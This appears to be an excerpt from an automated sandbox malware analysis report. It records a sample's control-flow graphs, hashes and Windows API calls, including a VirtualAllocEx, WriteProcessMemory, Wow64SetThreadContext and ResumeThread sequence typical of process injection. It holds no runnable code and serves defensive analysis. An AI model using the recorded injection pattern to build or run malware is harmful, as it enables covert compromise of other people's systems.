                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 70489e01072d0c3ff62e65e907bac58b7e92958d97871b7bcb3ea87fe9c70e0d
                    • Instruction ID: 8bbeb2437781d7f44e1ba9bffac65c0fc09301cefd5993697169be2bfdf71440
                    • Opcode Fuzzy Hash: 70489e01072d0c3ff62e65e907bac58b7e92958d97871b7bcb3ea87fe9c70e0d
                    • Instruction Fuzzy Hash: EC7168B0A10B068FDB24DF29D44176ABBF5FF88300F40892DD68AD7A40D775E94ACB90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 586 12a5a64-12a5a6f 588 12a5ae9-12a5b0b 586->588
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: baf4065bdf50afdace44e8bf4c768b77ea91212542d791c73f18c55897f6fb8a
                    • Instruction ID: 7eec2c52eb02a38a355d0f691a8a0fef01a1bd604874ffc5cc689ba61bab4e44
                    • Opcode Fuzzy Hash: baf4065bdf50afdace44e8bf4c768b77ea91212542d791c73f18c55897f6fb8a
                    • Instruction Fuzzy Hash: E131E2B192434ACFDB11CFA8C8557EEBBF0EF46314F94814AC549AF252C775A90ACB81

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 590 12a58ed-12a596c 592 12a596f-12a59b9 CreateActCtxA 590->592 594 12a59bb-12a59c1 592->594 595 12a59c2-12a5a1c 592->595 594->595 602 12a5a2b-12a5a2f 595->602 603 12a5a1e-12a5a21 595->603 604 12a5a40 602->604 605 12a5a31-12a5a3d 602->605 603->602 606 12a5a41 604->606 605->604 606->606
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 012A59A9
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 071af44feff5c8c79571b98fc87dd3d3192695c98a0a042630d1a0801ae3c8cd
                    • Instruction ID: 813081f83cdf44832df97f96095f41b100cbebb00da4a5c56c06afb8a5fe1040
                    • Opcode Fuzzy Hash: 071af44feff5c8c79571b98fc87dd3d3192695c98a0a042630d1a0801ae3c8cd
                    • Instruction Fuzzy Hash: 2641F2B0D10719CFDB24DFA9C884BCEBBB5BF49304F20805AD508AB251DB71694ACF90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 608 12a44b0-12a59b9 CreateActCtxA 612 12a59bb-12a59c1 608->612 613 12a59c2-12a5a1c 608->613 612->613 620 12a5a2b-12a5a2f 613->620 621 12a5a1e-12a5a21 613->621 622 12a5a40 620->622 623 12a5a31-12a5a3d 620->623 621->620 624 12a5a41 622->624 623->622 624->624
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 012A59A9
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 07c01548fc84e58f387d9ed3dd85102bcdd99356ec519ce4bfcb760083ad1546
                    • Instruction ID: ba8fa82256688c3f36a7304095eadd1040e363c61a5f55c933e1af53da83ea44
                    • Opcode Fuzzy Hash: 07c01548fc84e58f387d9ed3dd85102bcdd99356ec519ce4bfcb760083ad1546
                    • Instruction Fuzzy Hash: 6E41F1B0D10719CBDB24CFAAC844BCEBBF5BF49304F60806AD508AB251DB71694ACF90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 626 4ae6e8b-4ae6ede 628 4ae6eee-4ae6f2d WriteProcessMemory 626->628 629 4ae6ee0-4ae6eec 626->629 631 4ae6f2f-4ae6f35 628->631 632 4ae6f36-4ae6f66 628->632 629->628 631->632
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04AE6F20
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 2922c31759c33fefa6a746753393d09eb5258c52f6a49b05b029ad12688c231b
                    • Instruction ID: 4333dbc1c63e29028e711b69af86daa07a376cff9b2ebcd40677954094dd0d72
                    • Opcode Fuzzy Hash: 2922c31759c33fefa6a746753393d09eb5258c52f6a49b05b029ad12688c231b
                    • Instruction Fuzzy Hash: 872146B6D003498FCB10CFA9C9817EEBBF4FF48310F14882AE918A7241C7789944DBA0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 636 4ae6e90-4ae6ede 638 4ae6eee-4ae6f2d WriteProcessMemory 636->638 639 4ae6ee0-4ae6eec 636->639 641 4ae6f2f-4ae6f35 638->641 642 4ae6f36-4ae6f66 638->642 639->638 641->642
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04AE6F20
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 98f90b965af29da94478edbd737576895221f692f0f37c9c6a5a5c70dd5f5ee6
                    • Instruction ID: b13da76632888f3d7c63b5ac2ae847993405c5c55c396b4b4eb687a7caaefe4f
                    • Opcode Fuzzy Hash: 98f90b965af29da94478edbd737576895221f692f0f37c9c6a5a5c70dd5f5ee6
                    • Instruction Fuzzy Hash: 65213971D003499FDB10CFAAC885BEEBBF5FF48310F50842AE918A7240D778A954DBA0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 646 4ae6f78-4ae700d ReadProcessMemory 649 4ae700f-4ae7015 646->649 650 4ae7016-4ae7046 646->650 649->650
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04AE7000
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: 4264a9d6a2a5ecaf03f41d99c5fc4b42f8f6eb5e94623a9a082ab8579fdf9c93
                    • Instruction ID: a3b8c1ddd03d40d56f372fb724ea4a2f7d8c2deaf412a296684a0fe5cdf2f733
                    • Opcode Fuzzy Hash: 4264a9d6a2a5ecaf03f41d99c5fc4b42f8f6eb5e94623a9a082ab8579fdf9c93
                    • Instruction Fuzzy Hash: 75214AB6D003499FDB10CFA9C981AEEBBF5FF48320F14842AD518A3240D7789541DBA0
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012AD657
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 4a25eb2c8eee4092f612f8b36ec354ee7906400c99c429e91ad8da3827a59d66
                    • Instruction ID: e12d134a9e8d54beb1feeadf537411c3416eef1642a78f209bcf7561635a9b66
                    • Opcode Fuzzy Hash: 4a25eb2c8eee4092f612f8b36ec354ee7906400c99c429e91ad8da3827a59d66
                    • Instruction Fuzzy Hash: 0221E3B59012499FDB10CFAAD984ADEBFF4EB48310F14801AE918A3250D374A950CFA5
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04AE6D76
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: 328dd22907befcaef8419c4215c767c03bd7842c9fdaab07c092359959ca23e3
                    • Instruction ID: 84be7035f53f3782acff88fdc5c8a4109c69035b76cdc7f2ccd3a39d566bddb0
                    • Opcode Fuzzy Hash: 328dd22907befcaef8419c4215c767c03bd7842c9fdaab07c092359959ca23e3
                    • Instruction Fuzzy Hash: 1F214971D003098FDB10DFAAC4857EEBBF4EF58320F54842AD519A7241DB78A944CFA1
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04AE6D76
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
                    • Opcode ID: eb2a0dddca8917ff8377eea6bee25b8840d892d5874bfe5d1aee43efbe0a52b6
                    • Instruction ID: 8ad8cd28971ec1d384651aeeae0b0f9977c96446e65f234cf29d8813cb4e9875
                    • Opcode Fuzzy Hash: eb2a0dddca8917ff8377eea6bee25b8840d892d5874bfe5d1aee43efbe0a52b6
                    • Instruction Fuzzy Hash: CE2137B1D006098FDB10DFAAC5857EEBBF4EF58320F54842AD519A7241DB78A945CFA0
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04AE7000
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: 8747e1a5dec1daea14c489d2fe995914170946731538f2164e2443187e2bbbe9
                    • Instruction ID: 3186ca4a8b7782007478848b37c9304156ebf3e5cade31cd771151fb5199cf84
                    • Opcode Fuzzy Hash: 8747e1a5dec1daea14c489d2fe995914170946731538f2164e2443187e2bbbe9
                    • Instruction Fuzzy Hash: 832139B1D003499FDB10DFAAC881AEEFBF5FF48320F10842AE519A7241D7759940DBA0
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012AD657
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: d8f6443b579abafd2e5659417ab70b9790a1e1df807430f97e1c367fcd9b2c65
                    • Instruction ID: 22d9ed82062155a90e2fd821e159f3c3c9e7a399c9d4744d66ca3829a29f29c2
                    • Opcode Fuzzy Hash: d8f6443b579abafd2e5659417ab70b9790a1e1df807430f97e1c367fcd9b2c65
                    • Instruction Fuzzy Hash: 4421B0B59002499FDB10CFAAD984ADEBBF8EB48320F14841AE918A3250D374A954DFA5
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012AAFB9,00000800,00000000,00000000), ref: 012AB1CA
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 4e67c463cc2a8a340922824280472bb27ab099593f5634c6fb6266e12a49ff01
                    • Instruction ID: 4b60419cb78bf4ddf18ae94cfdc2c221109a7cf5882c445db13b551ec7261690
                    • Opcode Fuzzy Hash: 4e67c463cc2a8a340922824280472bb27ab099593f5634c6fb6266e12a49ff01
                    • Instruction Fuzzy Hash: D21103B69102098FDB10CFAAC884ADEFBF4EB89310F10842ED919A7200C375A645CFA5
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012AAFB9,00000800,00000000,00000000), ref: 012AB1CA
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 41caf7987067c06ece504a22c3c3b382fa6956718cfa49969c5c8dbdcfddab09
                    • Instruction ID: fe1def695e88d1abc20d4e33dae997848855db8a8ae95ca1e6b94c602628b82b
                    • Opcode Fuzzy Hash: 41caf7987067c06ece504a22c3c3b382fa6956718cfa49969c5c8dbdcfddab09
                    • Instruction Fuzzy Hash: EE1114B6D143099FDB10CF9AC848ADEFBF4EB89310F50842EE519A7200C375A945CFA4
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04AE6E3E
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: f46f2344ed8f0ce72603822a8dbb5dc077aa4eeeca6031800d237f887c84b306
                    • Instruction ID: d805edde02043d55b66c81dd4b26b13e93575c840d3fe82a1689acd1032b781e
                    • Opcode Fuzzy Hash: f46f2344ed8f0ce72603822a8dbb5dc077aa4eeeca6031800d237f887c84b306
                    • Instruction Fuzzy Hash: 7C1156B6D00249CFDB10DFA9C944BEEBBF5EF58320F14881AE519A7250DB359940CBA0
                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04AE6E3E
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 9483cf9a36930327c26ad00e40e2632d2e8a0f5d568f4be0a76c902a17bcce42
                    • Instruction ID: 570d64c6cb6567c999cc8d5160b021d859e6dd9cf7da657a71cbdf25abd81b39
                    • Opcode Fuzzy Hash: 9483cf9a36930327c26ad00e40e2632d2e8a0f5d568f4be0a76c902a17bcce42
                    • Instruction Fuzzy Hash: 1D1126729003499FDB10DFAAC844AEFBBF5EF98320F148819E519A7250CB75A944DBA0
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: 220fbbb8ee4c92f2f82f2b729de5b85be7c6e4ba045feec93cc1bc78baaa1cfc
                    • Instruction ID: 332ff1f1fa5a898005cc503f3affb603580d44506dec8668335ac9540393d672
                    • Opcode Fuzzy Hash: 220fbbb8ee4c92f2f82f2b729de5b85be7c6e4ba045feec93cc1bc78baaa1cfc
                    • Instruction Fuzzy Hash: D9113A71D003498FDB20DFAAC8457AEFBF4EF98320F148419D519A7240CB75A944CBA4
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: ResumeThread
                    • String ID:
                    • API String ID: 947044025-0
                    • Opcode ID: d94b3e0da87a39d599bb2766f1f7c8c3bee4a4a6456bb02582e81ef0b14f7556
                    • Instruction ID: da379ebfe8c5d1f2515d5922cde014be9ac86aaad46f72d7639d5f207199c5bb
                    • Opcode Fuzzy Hash: d94b3e0da87a39d599bb2766f1f7c8c3bee4a4a6456bb02582e81ef0b14f7556
                    • Instruction Fuzzy Hash: 88116AB5D003488FDB10DFAAC9857EEFBF5EF98320F24881AC519A7240CB35A545CBA4
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 04AEAD25
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2133996557.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_4ae0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: MessagePost
                    • String ID:
                    • API String ID: 410705778-0
                    • Opcode ID: fe267fc8130ae63b8b18844d83f7e557006f0390183f146f16f0dc0b3cefbc8c
                    • Instruction ID: 856119fbba1021981ebd1ccd7b46eb67f34e6a2ffc0964e11f6c18c79c601a79
                    • Opcode Fuzzy Hash: fe267fc8130ae63b8b18844d83f7e557006f0390183f146f16f0dc0b3cefbc8c
                    • Instruction Fuzzy Hash: 731106B5800349DFDB10DF9AC985BEEBBF8EB58320F108419E518A7200D375A944CFA1
                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 012AAF3E
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2127059706.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_12a0000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 732a87551be9a13bb2645eb26c8f6a417c28685657ac020b4ecd2cda72b03959
                    • Instruction ID: eb72762ba9c7d0b2129d9bdc2872d63503371472682defee46040c9871c0818a
                    • Opcode Fuzzy Hash: 732a87551be9a13bb2645eb26c8f6a417c28685657ac020b4ecd2cda72b03959
                    • Instruction Fuzzy Hash: 8111E0B6C003498FDB24CF9AD844ADEFBF8EF88324F14846AD519A7250D379A545CFA1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: de19a7fed2d8d022e628c1af9a6c712fd0c02109a4047756bbd1a234c607aa41
                    • Instruction ID: 3ad2209e314d18b0e940866f55a8260001806ce3c20a404c392c33d86ee01a2a
                    • Opcode Fuzzy Hash: de19a7fed2d8d022e628c1af9a6c712fd0c02109a4047756bbd1a234c607aa41
                    • Instruction Fuzzy Hash: 38216772E04200DFEB15DF04C9C0B27BF66FB99324F24C569E8090B246C37AD806E7A1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3777110c452f6be7d8c7cd077354a7714d5ebabe234aa6d9daea24155011ee51
                    • Instruction ID: 759c6801c85d2efd062492932ad154cbc40e7c78fc817a2d0be3f39e9d5b4d2a
                    • Opcode Fuzzy Hash: 3777110c452f6be7d8c7cd077354a7714d5ebabe234aa6d9daea24155011ee51
                    • Instruction Fuzzy Hash: BA214872A04244DFCB05DF04C9C0B16BF65FB98324F24C568D8090B24AC736EC06E6A2
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2126820234.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_f7d000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 36ff7bf43b281114ca040a22304f487d4475acbedea57af29e9b0af25a5d2557
                    • Instruction ID: bd7f6df7b0bd62c367a32f9103cc96dff2aac12859f46f3587b12469c4678a68
                    • Opcode Fuzzy Hash: 36ff7bf43b281114ca040a22304f487d4475acbedea57af29e9b0af25a5d2557
                    • Instruction Fuzzy Hash: B921D371A042049FDB05DF14D980B26BB75FF88324F64C56ED90D4B256C336D806DA62
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2126820234.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_f7d000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8359215a19a1f9e6a478b8d2bdb23658bfc17ede704ceb3a9cc15b8b0e4a2751
                    • Instruction ID: ac0dd9ba7ff8314c71ea456dea8dcea42933085512e0e0d0ad60d1e90ae18fc7
                    • Opcode Fuzzy Hash: 8359215a19a1f9e6a478b8d2bdb23658bfc17ede704ceb3a9cc15b8b0e4a2751
                    • Instruction Fuzzy Hash: 9821F276604200DFCB15DF14D984B26BB75EF88324F64C96ED80E4B28AC33AD807DA62
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2126820234.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_f7d000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ca9a9d5c33f0f5b6edc063ac068b5ab018fa17f273f69076c1bad5014d9dfedb
                    • Instruction ID: 389cf3e9e334c54108b10fde1eb84c02efdc675e0fbddeff40253d59e20493f9
                    • Opcode Fuzzy Hash: ca9a9d5c33f0f5b6edc063ac068b5ab018fa17f273f69076c1bad5014d9dfedb
                    • Instruction Fuzzy Hash: C42150755093808FDB12CF24D994715BF71EF46324F28C5EBD8498B6A7C33A980ADB62
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                    • Instruction ID: bc2fbe61698e24c2bf83eb298bb415be0a97bc7400ef344d2e60da8de99442eb
                    • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                    • Instruction Fuzzy Hash: D2112676904240CFCB06CF00D5C4B16BF71FB94324F24C2A9D8090B256C33AE85ADBA1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                    • Instruction ID: ef85b46a504b9f8992403a7f723e377abf146f8e6750ccce5c6bfdad0467bdca
                    • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                    • Instruction Fuzzy Hash: 70112676904240CFDB12CF00D9C4B16BF72FB95324F24C1A9D8094B256C33AD85ADBA1
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2126820234.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_f7d000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                    • Instruction ID: 5703059746f92929793ca553ee62c0cd185b15ed1b7a28917aa7d4445feebfc3
                    • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                    • Instruction Fuzzy Hash: FE11BB75904280DFCB06CF10C9C4B15BBB1FF84324F28C6AED8494B296C33AD81ADB62
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c6f5b75980577bf6b4ae228b6e24aaaae67b48521f4759dea6696c58040b023
                    • Instruction ID: 4cee382bc4394981c3c189d38f97cf56034d5b4394f9abaa86f7ea72ddec3da2
                    • Opcode Fuzzy Hash: 8c6f5b75980577bf6b4ae228b6e24aaaae67b48521f4759dea6696c58040b023
                    • Instruction Fuzzy Hash: E601DB72A053449FE7119A15CDC4766FFE8EF51334F18C45AED094A286C3799840E6B2
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2126757451.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_f6d000_TkdxROLUOVpK.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc84535f5d2f85d85aa08bae0dfe586102f29db3a04656acae17b0815678fe10
                    • Instruction ID: 3c8570c0f70776189ecb50b08fe6f432024c43f1de0ed5e8b9e506f278e15f64
                    • Opcode Fuzzy Hash: dc84535f5d2f85d85aa08bae0dfe586102f29db3a04656acae17b0815678fe10
                    • Instruction Fuzzy Hash: 0BF062729053449FE7208E16DD84B66FFA8EF51734F18C45AED484B286C3799844DAB1

                    Execution Graph

                    Execution Coverage:1.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:4.3%
                    Total number of Nodes:517
                    Total number of Limit Nodes:9
                    execution_graph 47110 434887 47111 434893 ___FrameUnwindToState 47110->47111 47136 434596 47111->47136 47113 43489a 47115 4348c3 47113->47115 47431 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47113->47431 47123 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47115->47123 47432 444251 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47115->47432 47117 4348dc 47119 4348e2 ___FrameUnwindToState 47117->47119 47433 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 47117->47433 47120 434962 47147 434b14 47120->47147 47123->47120 47434 4433e7 35 API calls 6 library calls 47123->47434 47131 43498e 47133 434997 47131->47133 47435 4433c2 28 API calls _Atexit 47131->47435 47436 43470d 13 API calls 2 library calls 47133->47436 47137 43459f 47136->47137 47437 434c52 IsProcessorFeaturePresent 47137->47437 47139 4345ab 47438 438f31 10 API calls 4 library calls 47139->47438 47141 4345b0 47142 4345b4 47141->47142 47439 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47141->47439 47142->47113 47144 4345bd 47145 4345cb 47144->47145 47440 438f5a 8 API calls 3 library calls 47144->47440 47145->47113 47441 436e90 47147->47441 47150 434968 47151 4441a2 47150->47151 47443 44f059 47151->47443 47153 4441ab 47154 434971 47153->47154 47447 446815 35 API calls 47153->47447 47156 40e9c5 47154->47156 